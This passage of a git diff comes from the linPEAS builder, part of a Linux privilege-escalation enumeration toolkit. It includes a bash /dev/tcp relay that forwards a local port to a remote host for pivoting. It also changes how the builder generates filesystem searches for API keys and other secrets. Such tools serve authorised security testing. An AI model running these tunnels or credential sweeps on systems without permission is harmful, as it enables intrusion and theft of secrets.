you have executed the commands" - read -n 1 + read -p "Press any key when you have executed those commands" useless_var bash -c "exec 3<>/dev/tcp/$REMOTE_IP/$REMOTE_PORT; exec 4<>/dev/tcp/$LOCAL_IP/9009; cat <&3 >&4 & cat <&4 >&3 &" - echo "If not error was indicated, your local port $LOCAL_PORT should be forwarded to $REMOTE_IP:$REMOTE_PORT" + echo "If not error was indicated, your host port $LOCAL_PORT should be forwarded to $REMOTE_IP:$REMOTE_PORT" } diff --git a/linPEAS/builder/src/linpeasBuilder.py b/linPEAS/builder/src/linpeasBuilder.py index 9954731..ab36744 100644 --- a/linPEAS/builder/src/linpeasBuilder.py +++ b/linPEAS/builder/src/linpeasBuilder.py @@ -2,6 +2,7 @@ import re import requests import base64 import os +from pathlib import Path from .peasLoaded import PEASLoaded from .peassRecord import PEASRecord @@ -11,7 +12,6 @@ from .yamlGlobals import ( PEAS_FINDS_MARKUP, PEAS_FINDS_CUSTOM_MARKUP, PEAS_STORAGES_MARKUP, - PEAS_STORAGES_MARKUP, INT_HIDDEN_FILES_MARKUP, ROOT_FOLDER, STORAGE_TEMPLATE, @@ -128,7 +128,6 @@ class LinpeasBuilder: #Check for empty seds assert 'sed -${E} "s,,' not in self.linpeas_sh - def __get_peass_marks(self): return re.findall(r'peass\{[\w\-\._ ]*\}', self.linpeas_sh) @@ -372,7 +371,6 @@ class LinpeasBuilder: return (suidVB, sudoVB, capsVB) def __generate_regexes_search(self) -> str: - paths_to_search = REGEXES_LOADED["paths"] regexes = REGEXES_LOADED["regular_expresions"] regexes_search_section = "" @@ -386,30 +384,17 @@ class LinpeasBuilder: caseinsensitive = entry.get("caseinsensitive", False) regex = entry["regex"] regex = regex.replace('"', '\\"').strip() - extra_grep = entry.get("extra_grep") - extra_grep = f"| grep {extra_grep}" if extra_grep else "" - - regexes_search_section += f'print_3title_no_nl "Searching {name} (limited to 50)..."\n' + falsePositives = entry.get("falsePositives", False) - # If custom folder to search in - regexes_search_section += 'if [ "$SEARCH_IN_FOLDER" ]; then\n' - regexes_search_section += " timeout 120 find \"$ROOT_FOLDER\" -type f -not -path \"*/node_modules/*\" -exec grep -HnRiIE \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n" + if falsePositives: + continue - # If search in all the file system - regexes_search_section += 'else\n' - for path in paths_to_search: - grep_flags = "-HnRiIE" if caseinsensitive else "-HnRIE" - regexes_search_section += " timeout 120 find "+path+" -type f -not -path \"*/node_modules/*\" -exec grep "+grep_flags+" \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n" - regexes_search_section += 'fi\n' + regexes_search_section += f" search_for_regex \"{name}\" \"{regex}\" {'1' if caseinsensitive else ''}\n" - regexes_search_section += "wait\n" - - regexes_search_section += "echo ''\n" + regexes_search_section += " echo ''\n\n" return regexes_search_section - - def __replace_mark(self, mark: str, find_calls: list, join_char: str): """Substitude the markup with the actual code""" diff --git a/linPEAS/builder/src/yamlGlobals.py b/linPEAS/builder/src/yamlGlobals.py index bf47f6a..713c318 100644 --- a/linPEAS/builder/src/yamlGlobals.py +++ b/linPEAS/builder/src/yamlGlobals.py @@ -1,5 +1,26 @@ import os import yaml +import requests +from pathlib import Path + + +def download_regexes(): + print("[+] Downloading regexes...") + url = "https://raw.githubusercontent.com/JaimePolop/RExpository/main/regex.yaml" + response = requests.get(url) + if response.status_code == 200: + # Save the content of the response to a file + script_folder = Path(os.path.dirname(os.path.abspath(__file__))) + target_file = script_folder / '..' / '..' / '..' / 'build_lists' / 'regexes.yaml' + + with open(target_file, "w") as file: + file.write(response.text) + print(f"Downloaded and saved in '{target_file}' successfully!") + else: + print("Error: Unable to download the regexes file.") + exit(1) + +download_regexes() CURRENT_DIR = os.path.dirname(os.path.realpath(__file__)) @@ -41,14 +62,19 @@ LINPEAS_PARTS = [ "file_path": LINPEAS_BASE_PARTS + "/7_software_information.sh" }, { - "name": "Interesting Files", + "name": "Files with Interesting Permissions", + "name_check": "interesting_perms_files", + "file_path": LINPEAS_BASE_PARTS + "/8_interesting_perms_files.sh" + }, + { + "name": "Other Interesting Files", "name_check": "interesting_files", - "file_path": LINPEAS_BASE_PARTS + "/8_interesting_files.sh" + "file_path": LINPEAS_BASE_PARTS + "/9_interesting_files.sh" }, { "name": "API Keys Regex", "name_check": "api_keys_regex", - "file_path": LINPEAS_BASE_PARTS + "/9_api_keys_regex.sh" + "file_path": LINPEAS_BASE_PARTS + "/10_api_keys_regex.sh" } ]